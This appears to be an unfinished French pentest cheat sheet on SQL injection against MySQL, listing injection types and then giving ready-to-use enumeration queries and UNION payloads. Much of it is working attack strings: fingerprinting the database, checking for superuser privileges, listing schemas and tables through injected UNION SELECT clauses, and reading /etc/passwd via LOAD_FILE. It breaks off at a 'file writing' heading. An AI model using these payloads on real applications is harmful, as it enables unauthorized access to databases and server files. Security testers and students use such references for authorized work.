Nym0x

Injections SQL 🚧

Types d’injection

Union Based

Error Based

Boolean Based

Time Based

Out-of-band

Exploitation

Énumération de la BDD

Fingerprinting

Tout d’abord, quelques commandes globales pour réaliser de l’énumération de la base de données :

-- Identifier la version de la base de données
SELECT @@version

-- Mettre un sleep de 5 secondes pour trigger une blind SQL
SELECT SLEEP(5)

-- Identifier la base de données actuelle
SELECT database()

Connaître l’utilisateur courant et ses privilèges

Savoir sous quel utilisateur nous pouvons exécuter des instructions SQL :

SELECT USER()
SELECT CURRENT_USER()
SELECT user from mysql.user

Savoir si l’utilisateur courant est privilégié :

SELECT super_priv FROM mysql.user

Si la réponse est “Y” pour “YES”, l’utilisateur est à privilèges élevés.

Lister les bases de données

SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA

# Exemple dans une injection SQL UNION
'UNION SELECT 1,SCHEMA_NAME,3,4 FROM INFORMATION_SCHEMA.SCHEMATA-- -

Lister les tables

SELECT TABLE_NAME,TABLE_SCHEMA FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='$DB'

# Exemple dans une injection SQL UNION
'UNION SELECT 1,TABLE_NAME,TABLE_SCHEMA,4 FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='$DB'-- -

Lecture de fichiers

Si l’utilisateur MySQL que l’on usurpe possède la permission FILE, il est alors possible de charger le contenu d’un fichier dans une table et de pouvoir en lire le contenu.

Pour connaître la présence de cette permission :

UNION SELECT 1, grantee, privilege_type, 4 FROM INFORMATION_SCHEMA.user_privileges WHERE grantee="$grantee"

Si FILE est retournée, alors il est possible de charger un fichier avec la fonction LOAD_FILE()

SELECT LOAD_FILE('/etc/passwd');

# Exemple dans une injection SQL UNION
' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -

Écriture de fichiers